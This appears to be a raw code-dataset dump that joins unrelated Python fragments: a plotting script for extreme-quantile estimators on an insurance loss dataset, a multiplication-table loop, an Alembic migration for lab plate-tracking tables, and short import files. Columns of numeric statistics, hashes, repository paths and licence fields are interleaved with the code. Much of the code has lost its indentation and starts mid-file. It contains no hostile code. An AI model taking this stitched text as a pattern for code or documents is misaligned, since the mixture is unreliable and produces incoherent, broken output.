plt.savefig(pathdir / "hill_plot_evt.eps", format="eps")
filename = "hill-{}-{}-{}-{}-{}-".format(distribution, params, n_replications, n_data, n_quantile)
plt.savefig(pathdir / "{}.eps".format(filename), format="eps")
return
# ====================================================================================================================
# Real plot
# ---------
def real_quantile_plot(saved=False):
sns.set_style("whitegrid", {'grid.linestyle': '--'})
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
X = pd.read_csv(Path(os.getcwd(), 'dataset', "besecura.txt"), sep='\t').loc[:, 'Loss'].to_numpy() # read data
X_order = np.sort(X)
n_data = len(X_order)
anchor_points = np.arange(2, n_data) # 2, ..., n-1
real_quantile = X_order[-1] # real extreme quantile at order 1/n
dict_evt = real_estimators(return_full=True)
# plot EVT estimator
for estimator in list_estimators: # list_estimators (all estimators)
lab ="{} (k={}, q={:.2f})".format(estimator, int(dict_evt[estimator]["bestK"][0]), np.array(dict_evt[estimator]["q_bestK"]).ravel()[0])
axes[0, 0].plot(anchor_points, np.array(dict_evt[estimator]["series"]).ravel(), label=lab)
axes[0, 0].scatter(dict_evt[estimator]["bestK"], dict_evt[estimator]["q_bestK"], s=100)
# plot reference line
axes[0, 0].hlines(y=real_quantile, xmin=0., xmax=n_data, color="black", linestyle="--")
# label="reference line (q={:.2f})".format(float(real_quantile))
axes[0, 0].legend()
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
# y_lim
axes[0, 0].set_ylim(real_quantile * 0.7, real_quantile * 1.6) # 100
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
axes[0, 0].yaxis.offsetText.set_fontsize(18)
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
# plt.savefig(pathdir / "quantile_plot_real.eps", format="eps")
plt.savefig(pathdir / "quantile_plot_real.jpg")
return
def real_quantile_plot_paper(saved=False):
sns.set_style("whitegrid", {'grid.linestyle': '--'})
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
X = pd.read_csv(Path(os.getcwd(), 'dataset', "besecura.txt"), sep='\t').loc[:, 'Loss'].to_numpy() # read data
X_order = np.sort(X)
n_data = len(X_order)
EXTREME_ALPHA = 1/n_data
anchor_points = np.arange(2, n_data) # 2, ..., n-1
real_quantile = X_order[-int(EXTREME_ALPHA*n_data)] # real extreme quantile at order 1/n
dict_evt = real_estimators(return_full=True)
axes[0, 0].plot(anchor_points, np.array(dict_evt["RW"]["series"]).ravel(), color="C1")
axes[0, 0].scatter(dict_evt["RW"]["bestK"], dict_evt["RW"]["q_bestK"], s=200, marker="^", color="C1")
axes[0, 0].plot(anchor_points, np.array(dict_evt["CW"]["series"]).ravel(), color="C2")
axes[0, 0].scatter(dict_evt["CW"]["bestK"], dict_evt["CW"]["q_bestK"], s=200,marker="^", color="C2")
# plot reference line
axes[0, 0].hlines(y=real_quantile, xmin=0., xmax=n_data, color="black", linestyle="--")
# label="reference line (q={:.2f})".format(float(real_quantile))
# axes[0, 0].legend()
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
# y_lim
axes[0, 0].set_ylim(real_quantile * 0.7, real_quantile * 1.6) # 100
plt.xticks(fontsize=20)
plt.yticks(np.arange(0.6, 1.3, 0.1)*1e7, labels=[0.6, 0.7,0.8,0.9,1., 1.1, 1.2], fontsize=20)
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
plt.savefig(pathdir / "quantile_plot_real.eps", format="eps")
return
def real_hill_plot(saved=False):
sns.set_style("whitegrid", {'grid.linestyle': '--'})
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
X = pd.read_csv(Path(os.getcwd(), 'dataset', "besecura.txt"), sep='\t').loc[:, 'Loss'].to_numpy() # read data
X_order = np.sort(X)
n_data = len(X_order)
EXTREME_ALPHA = 1 / n_data
evt_estimators = ExtremeQuantileEstimator(X=X_order, alpha=EXTREME_ALPHA)
anchor_points = np.arange(2, n_data) # 2, ..., n-1
hill_gammas = [evt_estimators.hill(k_anchor) for k_anchor in anchor_points]
k_prime = evt_estimators.get_kprime_rw(n_data-1)[0]
anchor_points_prime = np.arange(2, int(k_prime)+1)
hill_gammas_prime = [evt_estimators.hill(k_anchor) for k_anchor in anchor_points_prime]
bestK = random_forest_k(np.array(hill_gammas_prime), n_forests=10000, seed=42)
axes[0, 0].plot(anchor_points, hill_gammas, color="black")
axes[0, 0].scatter(bestK, hill_gammas[bestK -1], s=200, color="red", marker="^")
axes[0, 0].plot(anchor_points_prime, hill_gammas_prime, color="red")
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
plt.savefig(pathdir / "hill_plot_real.eps", format="eps")
return
def real_loglog_plot(saved=False):
sns.set_style("whitegrid", {'grid.linestyle': '--'})
fig, axes = plt.subplots(1, 1, figsize=(15, 7), sharex=False, squeeze=False) # 3 plots: quantile, var, mse
X = pd.read_csv(Path(os.getcwd(), 'dataset', "besecura.txt"), sep='\t').loc[:, 'Loss'].to_numpy() # read data
X_order = np.sort(X)
n_data = len(X_order)
K_STAR = 68
anchor_points = np.arange(2, n_data) # 2, ..., n-1
i_points = np.arange(1, K_STAR)
y = np.log(X_order[-i_points]) - np.log(X_order[-K_STAR])
X = np.log(K_STAR / i_points)
EXTREME_ALPHA = 1 / n_data
evt_estimators = ExtremeQuantileEstimator(X=X_order, alpha=EXTREME_ALPHA)
hill_gammas = [evt_estimators.hill(k_anchor) for k_anchor in anchor_points]
gamma = hill_gammas[K_STAR -1]
axes[0, 0].scatter(X, y, s=100, color="black", marker="+")
axes[0, 0].plot(X, X * gamma, color="red")
axes[0, 0].spines["left"].set_color("black")
axes[0, 0].spines["bottom"].set_color("black")
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
fig.tight_layout()
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
plt.savefig(pathdir / "loglog_plot_real.eps", format="eps")
return
def real_hist_plot(saved=False):
X = pd.read_csv(Path(os.getcwd(), 'dataset', "besecura.txt"), sep='\t').loc[:, 'Loss'].to_numpy() # read data
h = sns.displot(data=X, aspect=2, height=10)
h.set(ylabel=None) # remove the axis label
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
h.set(xticks=[1e6, 2e6, 3e6, 4e6, 5e6, 6e6, 7e6, 8e6])
h.set_xticklabels(np.arange(1, 9, 1))
sns.despine()
if saved:
pathdir = Path("imgs")
pathdir.mkdir(parents=True, exist_ok=True)
# plt.savefig(pathdir / "hist_real.eps", format="eps")
plt.savefig(pathdir / "hist_real.jpg")
return
| 41.763021 | 143 | 0.632724 | 2,312 | 16,037 | 4.213235 | 0.103374 | 0.026178 | 0.031414 | 0.017247 | 0.843753 | 0.806693 | 0.781645 | 0.760189 | 0.711118 | 0.702803 | 0 | 0.032556 | 0.189811 | 16,037 | 383 | 144 | 41.872063 | 0.717155 | 0.110432 | 0 | 0.679104 | 0 | 0 | 0.10227 | 0.008387 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029851 | false | 0 | 0.029851 | 0 | 0.100746 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
970414a6073eb0de51b86435d1c2b4a7a6be5bf9 | 131 | py | Python | Licence 1/I11/TP2/tp2_6_2.py | axelcoezard/licence | 1ed409c4572dea080169171beb7e8571159ba071 | [
"MIT"
] | 8 | 2020-11-26T20:45:12.000Z | 2021-11-29T15:46:22.000Z | Licence 1/I11/TP2/tp2_6_2.py | axelcoezard/licence | 1ed409c4572dea080169171beb7e8571159ba071 | [
"MIT"
] | null | null | null | Licence 1/I11/TP2/tp2_6_2.py | axelcoezard/licence | 1ed409c4572dea080169171beb7e8571159ba071 | [
"MIT"
] | 6 | 2020-10-23T15:29:24.000Z | 2021-05-05T19:10:45.000Z | for j in range(1, 11):
print("La table de", j)
for i in range(1, 11):
print(i, "*", j, "=", i * j)
print("\n")
| 21.833333 | 36 | 0.442748 | 24 | 131 | 2.416667 | 0.5 | 0.241379 | 0.275862 | 0.344828 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067416 | 0.320611 | 131 | 5 | 37 | 26.2 | 0.58427 | 0 | 0 | 0 | 0 | 0 | 0.114504 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.6 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
97577a97d2bc041ac0711f0e69fc8d45f32eeda9 | 11,102 | py | Python | migrations/versions/67476b337962_added_more_ytk_plate.py | charlestondance/amoslims | c1d051db3e88a92644446744a9027c5699f52b02 | [
"MIT"
] | null | null | null | migrations/versions/67476b337962_added_more_ytk_plate.py | charlestondance/amoslims | c1d051db3e88a92644446744a9027c5699f52b02 | [
"MIT"
] | 7 | 2020-03-24T15:56:29.000Z | 2022-01-13T00:48:15.000Z | migrations/versions/67476b337962_added_more_ytk_plate.py | charlestondance/amoslims | c1d051db3e88a92644446744a9027c5699f52b02 | [
"MIT"
] | null | null | null | """added more ytk plate
Revision ID: 67476b337962
Revises: 29b76ed5358c
Create Date: 2017-03-17 17:25:56.039832
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '67476b337962'
down_revision = '29b76ed5358c'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('ytk_job_master_level2',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('unique_job_id', sa.String(length=64), nullable=True),
sa.Column('part_id', sa.String(length=64), nullable=True),
sa.Column('job_master2_well_id', sa.String(length=64), nullable=True),
sa.Column('job_master2_barcode', sa.String(length=64), nullable=True),
sa.Column('sample_number', sa.Integer(), nullable=True),
sa.Column('uploaded_filename', sa.String(length=64), nullable=True),
sa.Column('level1clone_plate_barcode', sa.String(length=64), nullable=True),
sa.Column('level1clone_location_id', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_ytk_job_master_level2_job_master2_barcode'), 'ytk_job_master_level2', ['job_master2_barcode'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_job_master2_well_id'), 'ytk_job_master_level2', ['job_master2_well_id'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_level1clone_location_id'), 'ytk_job_master_level2', ['level1clone_location_id'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_level1clone_plate_barcode'), 'ytk_job_master_level2', ['level1clone_plate_barcode'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_part_id'), 'ytk_job_master_level2', ['part_id'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_sample_number'), 'ytk_job_master_level2', ['sample_number'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_unique_job_id'), 'ytk_job_master_level2', ['unique_job_id'], unique=False)
op.create_index(op.f('ix_ytk_job_master_level2_uploaded_filename'), 'ytk_job_master_level2', ['uploaded_filename'], unique=False)
op.create_table('ytk_stitch_clone',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('unique_job_id', sa.String(length=64), nullable=True),
sa.Column('clone_plate_well_id_96', sa.String(length=64), nullable=True),
sa.Column('well_number_96', sa.Integer(), nullable=True),
sa.Column('stitch_well_id', sa.String(length=64), nullable=True),
sa.Column('stitch_plate_barcode', sa.String(length=64), nullable=True),
sa.Column('clone_plate_barcode', sa.String(length=64), nullable=True),
sa.Column('stitch_id', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_ytk_stitch_clone_clone_plate_barcode'), 'ytk_stitch_clone', ['clone_plate_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_clone_plate_well_id_96'), 'ytk_stitch_clone', ['clone_plate_well_id_96'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_stitch_id'), 'ytk_stitch_clone', ['stitch_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_stitch_plate_barcode'), 'ytk_stitch_clone', ['stitch_plate_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_stitch_well_id'), 'ytk_stitch_clone', ['stitch_well_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_unique_job_id'), 'ytk_stitch_clone', ['unique_job_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_clone_well_number_96'), 'ytk_stitch_clone', ['well_number_96'], unique=False)
op.create_table('ytk_stitch_enzyme',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('unique_job_id', sa.String(length=64), nullable=True),
sa.Column('stitch_well_id', sa.String(length=64), nullable=True),
sa.Column('stitch_barcode', sa.String(length=64), nullable=True),
sa.Column('stitch_id', sa.String(length=64), nullable=True),
sa.Column('transfer_volume', sa.Integer(), nullable=True),
sa.Column('enzyme_plate_barcode', sa.String(length=64), nullable=True),
sa.Column('enzyme_plate_well_id', sa.String(length=64), nullable=True),
sa.Column('enzyme_plate_number', sa.String(length=64), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_barcode'), 'ytk_stitch_enzyme', ['enzyme_plate_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_number'), 'ytk_stitch_enzyme', ['enzyme_plate_number'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_well_id'), 'ytk_stitch_enzyme', ['enzyme_plate_well_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_stitch_barcode'), 'ytk_stitch_enzyme', ['stitch_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_stitch_id'), 'ytk_stitch_enzyme', ['stitch_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_stitch_well_id'), 'ytk_stitch_enzyme', ['stitch_well_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_transfer_volume'), 'ytk_stitch_enzyme', ['transfer_volume'], unique=False)
op.create_index(op.f('ix_ytk_stitch_enzyme_unique_job_id'), 'ytk_stitch_enzyme', ['unique_job_id'], unique=False)
op.create_table('ytk_stitch_list',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('unique_job_id', sa.String(length=64), nullable=True),
sa.Column('stitch_id', sa.String(length=64), nullable=True),
sa.Column('clip_number', sa.Integer(), nullable=True),
sa.Column('clip_batch_number', sa.Integer(), nullable=True),
sa.Column('concatenated_clip_id', sa.String(length=64), nullable=True),
sa.Column('clip_well_id', sa.String(length=64), nullable=True),
sa.Column('clip_barcode', sa.String(length=64), nullable=True),
sa.Column('stitch_well_id', sa.String(length=64), nullable=True),
sa.Column('stitch_plate_barcode', sa.String(length=64), nullable=True),
sa.Column('stitch_plate_number', sa.Integer(), nullable=True),
sa.Column('transfer_volume', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_ytk_stitch_list_clip_barcode'), 'ytk_stitch_list', ['clip_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_clip_batch_number'), 'ytk_stitch_list', ['clip_batch_number'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_clip_number'), 'ytk_stitch_list', ['clip_number'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_clip_well_id'), 'ytk_stitch_list', ['clip_well_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_concatenated_clip_id'), 'ytk_stitch_list', ['concatenated_clip_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_stitch_id'), 'ytk_stitch_list', ['stitch_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_stitch_plate_barcode'), 'ytk_stitch_list', ['stitch_plate_barcode'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_stitch_plate_number'), 'ytk_stitch_list', ['stitch_plate_number'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_stitch_well_id'), 'ytk_stitch_list', ['stitch_well_id'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_transfer_volume'), 'ytk_stitch_list', ['transfer_volume'], unique=False)
op.create_index(op.f('ix_ytk_stitch_list_unique_job_id'), 'ytk_stitch_list', ['unique_job_id'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_ytk_stitch_list_unique_job_id'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_transfer_volume'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_stitch_well_id'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_stitch_plate_number'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_stitch_plate_barcode'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_stitch_id'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_concatenated_clip_id'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_clip_well_id'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_clip_number'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_clip_batch_number'), table_name='ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_list_clip_barcode'), table_name='ytk_stitch_list')
op.drop_table('ytk_stitch_list')
op.drop_index(op.f('ix_ytk_stitch_enzyme_unique_job_id'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_transfer_volume'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_stitch_well_id'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_stitch_id'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_stitch_barcode'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_well_id'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_number'), table_name='ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_enzyme_enzyme_plate_barcode'), table_name='ytk_stitch_enzyme')
op.drop_table('ytk_stitch_enzyme')
op.drop_index(op.f('ix_ytk_stitch_clone_well_number_96'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_unique_job_id'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_stitch_well_id'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_stitch_plate_barcode'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_stitch_id'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_clone_plate_well_id_96'), table_name='ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_stitch_clone_clone_plate_barcode'), table_name='ytk_stitch_clone')
op.drop_table('ytk_stitch_clone')
op.drop_index(op.f('ix_ytk_job_master_level2_uploaded_filename'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_unique_job_id'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_sample_number'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_part_id'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_level1clone_plate_barcode'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_level1clone_location_id'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_job_master2_well_id'), table_name='ytk_job_master_level2')
op.drop_index(op.f('ix_ytk_job_master_level2_job_master2_barcode'), table_name='ytk_job_master_level2')
op.drop_table('ytk_job_master_level2')
# ### end Alembic commands ###
| 74.510067 | 149 | 0.769951 | 1,778 | 11,102 | 4.349269 | 0.045557 | 0.128023 | 0.070348 | 0.087935 | 0.950343 | 0.923316 | 0.871977 | 0.824389 | 0.793353 | 0.759084 | 0 | 0.017489 | 0.083228 | 11,102 | 148 | 150 | 75.013514 | 0.742287 | 0.027202 | 0 | 0.169231 | 0 | 0 | 0.455821 | 0.280405 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015385 | false | 0 | 0.015385 | 0 | 0.030769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
976e1fc21756a47326ad5d608856b7aad98910d7 | 37 | py | Python | suricata-4.1.4/python/suricata/sc/__init__.py | runtest007/dpdk_surcata_4.1.1 | 5abf91f483b418b5d9c2dd410b5c850d6ed95c5f | [
"MIT"
] | 77 | 2019-06-17T07:05:07.000Z | 2022-03-07T03:26:27.000Z | suricata-4.1.4/python/suricata/sc/__init__.py | clockdad/DPDK_SURICATA-4_1_1 | 974cc9eb54b0b1ab90eff12a95617e3e293b77d3 | [
"MIT"
] | 22 | 2019-07-18T02:32:10.000Z | 2022-03-24T03:39:11.000Z | suricata-4.1.4/python/suricata/sc/__init__.py | clockdad/DPDK_SURICATA-4_1_1 | 974cc9eb54b0b1ab90eff12a95617e3e293b77d3 | [
"MIT"
] | 49 | 2019-06-18T03:31:56.000Z | 2022-03-13T05:23:10.000Z | from suricata.sc.suricatasc import *
| 18.5 | 36 | 0.810811 | 5 | 37 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9796c7708bd029f88262b3f2d834eacab11f2776 | 34 | py | Python | TorchProteinLibrary/Volume/VolumeRMSD/__init__.py | anushriya/TorchProteinLibrary | 889b5594920b4b91bef40edaf478a4584e6ccd7d | [
"MIT"
] | 96 | 2018-10-18T20:08:32.000Z | 2021-09-27T11:31:25.000Z | TorchProteinLibrary/Volume/VolumeRMSD/__init__.py | anushriya/TorchProteinLibrary | 889b5594920b4b91bef40edaf478a4584e6ccd7d | [
"MIT"
] | 24 | 2018-10-19T13:59:21.000Z | 2021-08-04T16:13:48.000Z | TorchProteinLibrary/Volume/VolumeRMSD/__init__.py | anushriya/TorchProteinLibrary | 889b5594920b4b91bef40edaf478a4584e6ccd7d | [
"MIT"
] | 23 | 2018-12-06T06:17:18.000Z | 2021-10-05T12:46:34.000Z | from .VolumeRMSD import VolumeRMSD | 34 | 34 | 0.882353 | 4 | 34 | 7.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 34 | 1 | 34 | 34 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8af904c42068b0c8c187c16a313750c7afa2dbc9 | 61 | py | Python | upfork/__init__.py | lambdaxymox/upfork | c6eb5cb72d4f6c7f94321aad58fcb8f19f6fa9fa | [
"Apache-2.0",
"MIT"
] | null | null | null | upfork/__init__.py | lambdaxymox/upfork | c6eb5cb72d4f6c7f94321aad58fcb8f19f6fa9fa | [
"Apache-2.0",
"MIT"
] | null | null | null | upfork/__init__.py | lambdaxymox/upfork | c6eb5cb72d4f6c7f94321aad58fcb8f19f6fa9fa | [
"Apache-2.0",
"MIT"
] | null | null | null | from . import upfork
def upfork_main():
upfork.main()
| 10.166667 | 21 | 0.655738 | 8 | 61 | 4.875 | 0.625 | 0.512821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.229508 | 61 | 5 | 22 | 12.2 | 0.829787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c1a2a03ff7aba993fe925366d0919a22098fa06d | 26 | py | Python | synchron/udemywidget/__init__.py | sequencecentral/Synchronicity2 | cc3a02fe7540ac5f717a106edeaa3e67e76febb7 | [
"MIT"
] | null | null | null | synchron/udemywidget/__init__.py | sequencecentral/Synchronicity2 | cc3a02fe7540ac5f717a106edeaa3e67e76febb7 | [
"MIT"
] | null | null | null | synchron/udemywidget/__init__.py | sequencecentral/Synchronicity2 | cc3a02fe7540ac5f717a106edeaa3e67e76febb7 | [
"MIT"
] | null | null | null | from .udemywidget import * | 26 | 26 | 0.807692 | 3 | 26 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 26 | 1 | 26 | 26 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c1ad8e0b64190b52d8473bc8e0fa6097c67a4b12 | 69 | py | Python | neslter/__init__.py | WHOIGit/nes-lter-ims | d4cc96c10da56ca33286af84d669625b67170522 | [
"MIT"
] | 3 | 2019-01-24T16:32:50.000Z | 2021-11-05T02:18:12.000Z | neslter/__init__.py | WHOIGit/nes-lter-ims | d4cc96c10da56ca33286af84d669625b67170522 | [
"MIT"
] | 45 | 2019-05-23T15:15:32.000Z | 2022-03-15T14:09:20.000Z | neslter/__init__.py | WHOIGit/nes-lter-ims | d4cc96c10da56ca33286af84d669625b67170522 | [
"MIT"
] | null | null | null | from neslter.parsing.files import Resolver # FIXME move to workflow
| 23 | 67 | 0.811594 | 10 | 69 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144928 | 69 | 2 | 68 | 34.5 | 0.949153 | 0.318841 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a9ca1df8f58d050a903642beef41fce126230751 | 126 | py | Python | routers/__init__.py | pinchXOXO/Pexon-Rest-API | b7310693ff88a3e22c5e9eee8589f4a79aba97a5 | [
"MIT"
] | 14 | 2021-03-16T15:48:52.000Z | 2021-07-20T10:53:32.000Z | routers/__init__.py | pinchXOXO/Pexon-Rest-API | b7310693ff88a3e22c5e9eee8589f4a79aba97a5 | [
"MIT"
] | 1 | 2021-03-18T02:27:36.000Z | 2021-03-20T16:17:31.000Z | routers/__init__.py | pinchXOXO/Pexon-Rest-API | b7310693ff88a3e22c5e9eee8589f4a79aba97a5 | [
"MIT"
] | 4 | 2021-03-17T06:18:00.000Z | 2021-04-14T11:13:29.000Z | from .user import user_router
from .login import login_router
from .signup import signup_router
from .todo import todo_router
